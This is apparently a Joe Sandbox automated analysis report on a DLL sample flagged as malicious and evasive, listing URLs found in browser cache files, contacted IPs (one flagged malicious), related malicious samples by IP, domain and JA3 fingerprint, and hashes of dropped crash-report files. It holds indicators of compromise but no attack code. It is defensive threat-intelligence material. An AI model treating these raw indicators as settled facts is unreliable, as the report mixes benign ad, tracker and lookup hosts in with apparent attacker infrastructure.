https://www.skype.com/	de-ch[1].htm.8.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562	de-ch[1].htm.8.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.8.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.8.dr	false		high
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	52-478955-68ddb2ab[1].js.8.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.8.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	52-478955-68ddb2ab[1].js.8.dr	false		high
https://client-s.gateway.messenger.live.com	52-478955-68ddb2ab[1].js.8.dr	false		high
https://www.msn.com/de-ch/nachrichten/vermischtes/20-j%c3%a4hriger-nach-attacke-auf-passanten-im-nie	de-ch[1].htm.8.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.8.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	52-478955-68ddb2ab[1].js.8.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	~DFC2EE9AE5846D5CA6.TMP.6.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.8.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/der-regierungsrat-hat-%c3%bcberbordet-lehrer-und-e	de-ch[1].htm.8.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.8.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.8.dr	false		high
https://twitter.com/i/notifications;Ich	52-478955-68ddb2ab[1].js.8.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.8.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.8.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/die-gutschein-idee-des-bundes-polarisiert-ein-impf	de-ch[1].htm.8.dr	false		high
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	52-478955-68ddb2ab[1].js.8.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.8.dr	false		high
http://www.youtube.com/	msapplication.xml7.6.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.8.dr	false		high
https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer	de-ch[1].htm.8.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	52-478955-68ddb2ab[1].js.8.dr	false		high
https://www.skype.com/de	52-478955-68ddb2ab[1].js.8.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.8.dr	false		high
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	de-ch[1].htm.8.dr	false	URL Reputation: safe	unknown
https://www.skype.com/de/download-skype	52-478955-68ddb2ab[1].js.8.dr	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.8.dr	false		high
https://fra1-ib.adnxs.com/click?ajUk7rH0yT_CBWlev_TFPwAAAADXowxAwgVpXr_0xT9qNSTusfTJP9fPZSQP3JQZhtAC	auction[1].htm.8.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	52-478955-68ddb2ab[1].js.8.dr	false		high
https://onedrive.live.com;OneDrive-App	52-478955-68ddb2ab[1].js.8.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.8.dr	false		high
https://marketing.outbrain.com/network/redir?p=v32QGHAgJSsc5iQUmc_8pzjvwpvCgGeqUtF8mqZlq22g-2MjMNlW2	de-ch[1].htm.8.dr	false		high
https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692	de-ch[1].htm.8.dr	false		high
http://www.amazon.com/	msapplication.xml.6.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	52-478955-68ddb2ab[1].js.8.dr	false		high
https://www.msn.com/de-ch/news/other/dachstock-von-wohnhaus-ist-vollst%c3%a4ndig-ausgebrannt/ar-AAP3	de-ch[1].htm.8.dr	false		high
http://www.twitter.com/	msapplication.xml5.6.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	52-478955-68ddb2ab[1].js.8.dr	false		high
https://policies.oath.com/us/en/oath/privacy/index.html	auction[1].htm.8.dr	false		high
https://s.yimg.com/lo/api/res/1.2/Ykihn_T97HyKmYp1zmghmg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1	auction[1].htm.8.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.dr	false		high
https://outlook.com/	de-ch[1].htm.8.dr	false		high
https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"	de-ch[1].htm.8.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	~DFC2EE9AE5846D5CA6.TMP.6.dr	false		high
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	iab2Data[1].json.8.dr	false	URL Reputation: safe	unknown
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.dr	false		high
https://srtb.msn.com:443/notify/viewedg?rid=59c0595395b644768e22501793011ec8&r=infopane&i=1&	auction[1].htm.8.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	52-478955-68ddb2ab[1].js.8.dr	false		high
https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"	auction[1].htm.8.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	~DFC2EE9AE5846D5CA6.TMP.6.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.8.dr	false		high
https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t	de-ch[1].htm.8.dr	false		high
https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=b3mvDC8GIS.jUCWNdVkGlgtY41ueuFbyEHKyWYSddewJ	auction[1].htm.8.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/interview-thomas-matter-wir-krampfen-und-die-linke	de-ch[1].htm.8.dr	false		high
http://www.nytimes.com/	msapplication.xml3.6.dr	false		high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.8.dr	false		high
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	iab2Data[1].json.8.dr	false	URL Reputation: safe	unknown
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.8.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	52-478955-68ddb2ab[1].js.8.dr	false		high
http://popup.taboola.com/german	auction[1].htm.8.dr	false		high
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.8.dr	false		high
https://secure.adnxs.com/clktrb?id=761754	de-ch[1].htm.8.dr	false		high
https://dcdn.adnxs.com/shftr/https%253A%252F%252Fcrcdn01.adnxs-simple.com%252Fcreative%252Fp%252F116	auction[1].htm.8.dr	false		high
https://twitter.com/	de-ch[1].htm.8.dr	false		high
https://www.msn.com/de-ch/news/other/war-fr%c3%bcher-alles-besser-so-stehen-die-swiss-und-der-flugha	de-ch[1].htm.8.dr	false		high
https://outlook.live.com/calendar	52-478955-68ddb2ab[1].js.8.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
87.248.118.23	edge.gycpi.b.yahoodns.net	United Kingdom	203220	YAHOO-DEBDE	false
194.146.249.137	unknown	Poland	50606	VIRTUAOPERATOR-ASPL	false
151.101.1.44	tls13.taboola.map.fastly.net	United States	54113	FASTLYUS	false
179.189.229.254	unknown	Brazil	28669	America-NETLtdaBR	false
46.99.188.223	unknown	Albania	21246	IPKO-ASAL	true
104.20.184.68	geolocation.onetrust.com	United States	13335	CLOUDFLARENETUS	false
104.26.6.139	btloader.com	United States	13335	CLOUDFLARENETUS	false
60.51.47.65	unknown	Malaysia	4788	TMNET-AS-APTMNetInternetServiceProviderMY	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	495657
Start date:	02.10.2021
Start time:	18:12:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 8s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	DAQzQ6FyNs (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.evad.winDLL@27/126@18/10
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Created / dropped Files have been reduced to 100 Excluded IPs from analysis (whitelisted): 23.54.113.53, 23.210.181.177, 131.253.33.203, 131.253.33.200, 13.107.22.200, 23.10.249.32, 23.10.249.18, 65.55.44.109, 2.22.155.145, 95.100.54.203, 204.79.197.203, 95.100.48.88, 13.107.43.16, 13.107.5.88, 20.199.120.182, 20.49.157.6, 152.199.19.161, 20.199.120.85, 52.168.117.173, 20.82.210.154, 23.10.249.26, 23.10.249.43, 20.199.120.151, 40.112.88.60, 20.54.110.249 Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, e11290.dspg.akamaiedge.net, config-edge-skype.l-0007.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, secure-adnxs.edgekey.net, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, a1999.dscg2.akamai.net, vip3-wns2-par02p.wns.notify.trafficmanager.net, web.vortex.data.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, cs9.wpc.v0cdn.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, client.wns.windows.com, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, l-0007.config.skype.com, icePrime.a-0003.dc-msedge.net, l-0007.dc-msedge.net, go.microsoft.com.edgekey.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, static-global-s-msn-com.akamaized.net, e6115.g.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:13:52	API Interceptor	2x Sleep call for process: rundll32.exe modified
18:13:52	API Interceptor	16x Sleep call for process: wermgr.exe modified
18:13:54	API Interceptor	1x Sleep call for process: loaddll32.exe modified
18:14:08	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
34.117.59.81	xQA8Hrzifh.exe	Get hash	malicious	Browse	ipecho.net/plain
	VMSstxYMnW.exe	Get hash	malicious	Browse	ipinfo.io/185.32.222.18
	EYX1HJKw2D.exe	Get hash	malicious	Browse	ipinfo.io/84.17.52.67
	iJLJoPbXoR.exe	Get hash	malicious	Browse	ipinfo.io/ip
	7J847I4nj1.exe	Get hash	malicious	Browse	ipinfo.io/ip
	W02veTPZvS.exe	Get hash	malicious	Browse	myexternalip.com/raw
	ztXN1Pfp4G.exe	Get hash	malicious	Browse	ipecho.net/plain
	oevvvcBBV7.exe	Get hash	malicious	Browse	ipecho.net/plain
	TWY64j9zbc.dll	Get hash	malicious	Browse	myexternalip.com/raw
	comprobante201-.FVWIDSCYZCNBXUV#U03c1.bat	Get hash	malicious	Browse	ipinfo.io/json
	In-zoomConference.exe	Get hash	malicious	Browse	ipinfo.io/ip
	1tkcPigLWj.exe	Get hash	malicious	Browse	ipinfo.io/84.17.52.72
	1tkcPigLWj.exe	Get hash	malicious	Browse	ipinfo.io/84.17.52.72
	XTkd3fFsjJ.exe	Get hash	malicious	Browse	ipinfo.io/ip
	US9tMRxy0v.exe	Get hash	malicious	Browse	ipinfo.io/ip
	xCtHSIp9Bx.exe	Get hash	malicious	Browse	ipinfo.io/ip
	setup_installer.exe	Get hash	malicious	Browse	ipinfo.io/ip
	exPlEx.dll	Get hash	malicious	Browse	ipinfo.io/ip
	plDeCa.dll	Get hash	malicious	Browse	ipecho.net/plain
	prevPwDe.dll	Get hash	malicious	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
tls13.taboola.map.fastly.net	v9ZD101UF6.exe	Get hash	malicious	Browse	151.101.1.44
	1234.dll	Get hash	malicious	Browse	151.101.1.44
	1234.dll	Get hash	malicious	Browse	151.101.1.44
	QlQWL2ZhXg.dll	Get hash	malicious	Browse	151.101.1.44
	dfRhWS3qHO.dll	Get hash	malicious	Browse	151.101.1.44
	N34jiNSWAx.dll	Get hash	malicious	Browse	151.101.1.44
	unpacked.dll	Get hash	malicious	Browse	151.101.1.44
	yGI53fbtYF.dll	Get hash	malicious	Browse	151.101.1.44
	TL9pxrAN6l.dll	Get hash	malicious	Browse	151.101.1.44
	FVTxHtdcIn.dll	Get hash	malicious	Browse	151.101.1.44
	2k0c2Cohem.dll	Get hash	malicious	Browse	151.101.1.44
	GyN6sdIk01.dll	Get hash	malicious	Browse	151.101.1.44
	xzSanqYGCS.dll	Get hash	malicious	Browse	151.101.1.44
	0FUYsaCiq5.dll	Get hash	malicious	Browse	151.101.1.44
	Vbdp12U55W.dll	Get hash	malicious	Browse	151.101.1.44
	R7iUj0BC9h.dll	Get hash	malicious	Browse	151.101.1.44
	FOR375dUI5.dll	Get hash	malicious	Browse	151.101.1.44
	ta4VaUuaDC.dll	Get hash	malicious	Browse	151.101.1.44
	ZKpExCYyaF.dll	Get hash	malicious	Browse	151.101.1.44
	qGeIz2G5d8.dll	Get hash	malicious	Browse	151.101.1.44
contextual.media.net	v9ZD101UF6.exe	Get hash	malicious	Browse	2.22.155.145
	stage2.dll	Get hash	malicious	Browse	23.54.113.52
	FLyeuhDRux.dll	Get hash	malicious	Browse	2.22.155.145
	LvdXN6pHuo.dll	Get hash	malicious	Browse	2.22.155.145
	rQDgw29Wsf.dll	Get hash	malicious	Browse	2.22.155.145
	xg.dll	Get hash	malicious	Browse	2.22.155.145
	xg.dll	Get hash	malicious	Browse	2.22.155.145
	F8RGGe0pyU.dll	Get hash	malicious	Browse	2.22.155.145
	osxdeGVooL.dll	Get hash	malicious	Browse	2.22.155.145
	2ht3YT5itW.dll	Get hash	malicious	Browse	2.22.155.145
	QvD1Gl4WdM.dll	Get hash	malicious	Browse	2.22.155.145
	qIvm59yDnt.dll	Get hash	malicious	Browse	2.22.155.145
	255nKrnNXJ.dll	Get hash	malicious	Browse	2.22.155.145
	EAAD0TCXrj.dll	Get hash	malicious	Browse	2.22.155.145
	1234.dll	Get hash	malicious	Browse	2.22.155.145
	1234.dll	Get hash	malicious	Browse	2.22.155.145
	IuUny1eqO7.dll	Get hash	malicious	Browse	2.22.155.145
	QlQWL2ZhXg.dll	Get hash	malicious	Browse	2.22.155.145
	1dV1NyOcq6.dll	Get hash	malicious	Browse	2.22.155.145
	R1d0wpS2LW.dll	Get hash	malicious	Browse	2.22.155.145

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	yT6sVqj4WT.exe	Get hash	malicious	Browse	34.117.59.81
	GSZm5q9Oxg.exe	Get hash	malicious	Browse	34.117.59.81
	YkFtBeP6Yd.exe	Get hash	malicious	Browse	34.117.59.81
	C7DF63BD3D9DBD3CBD11E02D0CA6F8988251BF5BEA12D.exe	Get hash	malicious	Browse	34.117.59.81
	sK3rCvH0RZ.exe	Get hash	malicious	Browse	34.117.59.81
	xQA8Hrzifh.exe	Get hash	malicious	Browse	34.117.59.81
	5wjsgvzfR8.exe	Get hash	malicious	Browse	34.117.59.81
	37B2718705E2CDCBE38E2E27173BA95467B68D45187A2.exe	Get hash	malicious	Browse	34.117.59.81
	20F43079CF75825C5E909B04F3C0B8BDB2F71BE7477FB.exe	Get hash	malicious	Browse	34.117.59.81
	A6A0C59A5F4C53AC5DF74AAE93D700CF287A370505D81.exe	Get hash	malicious	Browse	34.117.59.81
	63301A39B93B63ACAB80E0A05B909F733D792C7AE829A.exe	Get hash	malicious	Browse	34.117.59.81
	F2F9785308BB396F5EB8C14E746228D3298A5984313EF.exe	Get hash	malicious	Browse	34.117.59.81
	3153CAF54366C0DDEDDD293791B8F05EABD7343D9A73C.exe	Get hash	malicious	Browse	34.117.59.81
	TVqNxfcPtM.exe	Get hash	malicious	Browse	34.117.59.81
	VMSstxYMnW.exe	Get hash	malicious	Browse	34.117.59.81
	EYX1HJKw2D.exe	Get hash	malicious	Browse	34.117.59.81
	Y76514IzYh	Get hash	malicious	Browse	34.117.159.33
	arm	Get hash	malicious	Browse	34.116.12.165
	iJLJoPbXoR.exe	Get hash	malicious	Browse	34.117.59.81
	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	Get hash	malicious	Browse	34.117.59.81

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	test.xlsx	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	v9ZD101UF6.exe	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	FLyeuhDRux.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	LvdXN6pHuo.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	rQDgw29Wsf.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	xg.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	xg.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	F8RGGe0pyU.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	osxdeGVooL.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	2ht3YT5itW.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	QvD1Gl4WdM.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	qIvm59yDnt.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	255nKrnNXJ.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	EAAD0TCXrj.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	1234.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	1234.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	IuUny1eqO7.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	QlQWL2ZhXg.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	1dV1NyOcq6.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
	R1d0wpS2LW.dll	Get hash	malicious	Browse	104.20.184.68 87.248.118.23 104.26.6.139 151.101.1.44
8916410db85077a5460817142dcbc8de	so2ZCH5rWo.exe	Get hash	malicious	Browse	179.189.229.254
	GxE5gZdkR8.exe	Get hash	malicious	Browse	179.189.229.254
	xQA8Hrzifh.exe	Get hash	malicious	Browse	179.189.229.254
	4rLVOKh7mJ.exe	Get hash	malicious	Browse	179.189.229.254
	uUDAYd4NSj.exe	Get hash	malicious	Browse	179.189.229.254
	MPkJ5HLngx.exe	Get hash	malicious	Browse	179.189.229.254
	test1.dll	Get hash	malicious	Browse	179.189.229.254
	ucb8qUBiwS.exe	Get hash	malicious	Browse	179.189.229.254
	Mexp6bV2T2.exe	Get hash	malicious	Browse	179.189.229.254
	OSsaAC9Zak.exe	Get hash	malicious	Browse	179.189.229.254
	7GgNfdcoB4.exe	Get hash	malicious	Browse	179.189.229.254
	zmbct5agcD.exe	Get hash	malicious	Browse	179.189.229.254
	F3Yyj3fF4k.exe	Get hash	malicious	Browse	179.189.229.254
	McYFrqRcE3.exe	Get hash	malicious	Browse	179.189.229.254
	V4NiEfb4bE.exe	Get hash	malicious	Browse	179.189.229.254
	Ue3cby33a7.exe	Get hash	malicious	Browse	179.189.229.254
	9XE9o2AvE1.exe	Get hash	malicious	Browse	179.189.229.254
	pml5zWK55l.exe	Get hash	malicious	Browse	179.189.229.254
	G9vY9x8lZm.exe	Get hash	malicious	Browse	179.189.229.254
	ydUqILF7lK.exe	Get hash	malicious	Browse	179.189.229.254

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_e1f57133c5888a314bdc731e15116bd1403369_7a325c51_179ef117\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11270
Entropy (8bit):	3.7791569104988723
Encrypted:	false
SSDEEP:	192:5azcJb6VsKHBUZMXYje9+1/u7sTS274Itpm:WcF6VZBUZMXYjeI/u7sTX4Itpm
MD5:	346E5450A3CFAFF705C139F774C528A7
SHA1:	08464A968BC26B6C650BBA343E1EDA95DBF246C1
SHA-256:	2FDFDD12EF3A91EA30CECB4EED8060434B2B0EB9C172405D46F188A384D6DA86
SHA-512:	CB55D26BAA8541E0C7F627C2D5AFE29631F37C43C41AF90A851DFB6AD3024F632385CDC49E42010A5B807316E1C23424D4848B74815149DCF18E620B623E9339
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.6.9.7.2.3.5.4.5.1.9.9.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.6.9.7.2.4.6.8.4.7.9.9.6.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.f.9.6.9.3.c.-.f.b.7.d.-.4.f.1.7.-.a.4.3.6.-.1.0.8.c.a.9.5.8.6.5.5.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.2.e.f.7.c.f.-.d.7.c.3.-.4.2.7.0.-.b.2.d.3.-.9.4.7.7.a.d.3.5.5.5.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.5.c.-.0.0.0.1.-.0.0.1.6.-.2.b.1.6.-.d.3.d.4.f.3.b.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE20.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Oct 3 01:13:57 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	55978
Entropy (8bit):	2.2276458159795096
Encrypted:	false
SSDEEP:	192:mBsiAOnfjGA1PGYkeyPx4pSut0hL8pc8DImV/xKk8noa8:MsiAOnfKoGY6J4HeappEmV/x984
MD5:	F0D394E94453358AFCA9EF8C2DA3704E
SHA1:	7A6D48D63549196AE3A3408C376E2DCB4B0C1994
SHA-256:	9F3DE43C88AE0C40CB76786551490FCF5514C521A2D1B96A1903A8EC74CA81DB
SHA-512:	93C64EFD545C0F9E72B2C46F48C149123BAB5B6B83D200AAE0E329A34A5DB7B18FD7050E0E4AD3B33EC14122DE36AEE0F9BB03317A6F587F6BB8FC187EC8F337
Malicious:	false
Preview:	MDMP....... .........Ya...................U...........B......\|.......GenuineIntelW...........T.......\.....Ya.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB6F.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8372
Entropy (8bit):	3.695037579474326
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiQE666Yq86f0egmfysSqCprg89bMTsf02km:RrlsNir666YJ69gmfysSPM4f1
MD5:	B46112BCB2F5F2850C5061DE09E24395
SHA1:	041A58FDE54E490B02F3EBD6E42449124BA69768
SHA-256:	4A3A86EA4F55C0290661F4ED6AB114A616DD4CC61D094828325CA035EB88A16C
SHA-512:	7F406D34E6B7C5EB9E5F2826CB7C8F86437435212967D00B469B0A07F256037B70B7DBDFCA6F9494EB8BD8CBBE431A143C937AC7E240A4F867C914ECE2D0F89E
Malicious:	false
